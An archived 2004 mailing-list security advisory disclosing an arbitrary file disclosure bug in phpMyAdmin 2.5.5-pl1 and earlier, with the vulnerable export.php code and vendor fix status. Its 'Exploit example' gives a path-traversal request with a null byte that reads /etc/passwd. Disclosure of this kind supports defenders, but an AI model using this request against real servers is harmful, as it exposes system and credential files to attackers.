| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20040203102857.GA10706@netvigilance.com>
Date: Tue, 3 Feb 2004 11:28:57 +0100
From: Cedric Cochin <cco@...vigilance.com>
To: submissions@...ketstormsecurity.org, vuln@...unia.com,
news@...uriteam.com, bugtraq@...urityfocus.com,
bugs@...uritytracker.com
Subject: Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior
################################################################################
Summary :
phpMyAdmin is a tool written in PHP intended to handle the administration of
MySQL over the WWW. There is a vulnerability in the current stable version of
phpMyAdmin that allows an attacker to retrieve arbitrary files from the
webserver with privileges of the webserver..
################################################################################
Details :
The export PHP script can be exploited to disclose arbitrary file using a
include() PHP call.
Vulnerable Systems:
* phpMyAdmin 2.5.5-pl1 and prior
Release Date :
February 2, 2004
Severity :
HIGH
################################################################################
Examples :
-------------------------------------------
I - Arbitrary File Disclosure
(HIGH Risk)
File impacted : export.php
14:// What type of export are we doing?
15:if ($what == 'excel') {
16: $type = 'csv';
17:} else {
18: $type = $what;
19:}
20:
21:/**
22: * Defines the url to return to in case of error in a sql statement
23: */
24:require('./libraries/export/' . $type . '.php');
Exploit example:
- -- HTTP Request --
http://[target]/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00
- -- HTTP Request --
The vulnerability is available evenif PHP register_globals is set to off.
################################################################################
Vendor Status :
The information has been provided to the phpMyAdmin Project Managers.
A new release candidate 2.5.6-rc1 with fixes for this vulnerability is available.
- --> http://www.phpmyadmin.net/home_page/
- --> http://www.phpmyadmin.net/home_page/relnotes.php?rel=0
################################################################################
Credit :
Cedric Cochin, Security Engineer, netVigilance, Inc. (www.netvigilance.com)
< cco@...vigilance.com >
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQFAH3dJA9/8vqmWoYQRAjNoAJ4pGgoQBT9WoyPmbfw4h/6LkcjR6wCeNBj2
ekO25itz2ssIvwgf2WRb/4k=
=Yuh1
-----END PGP SIGNATURE-----
Powered by blists - more mailing lists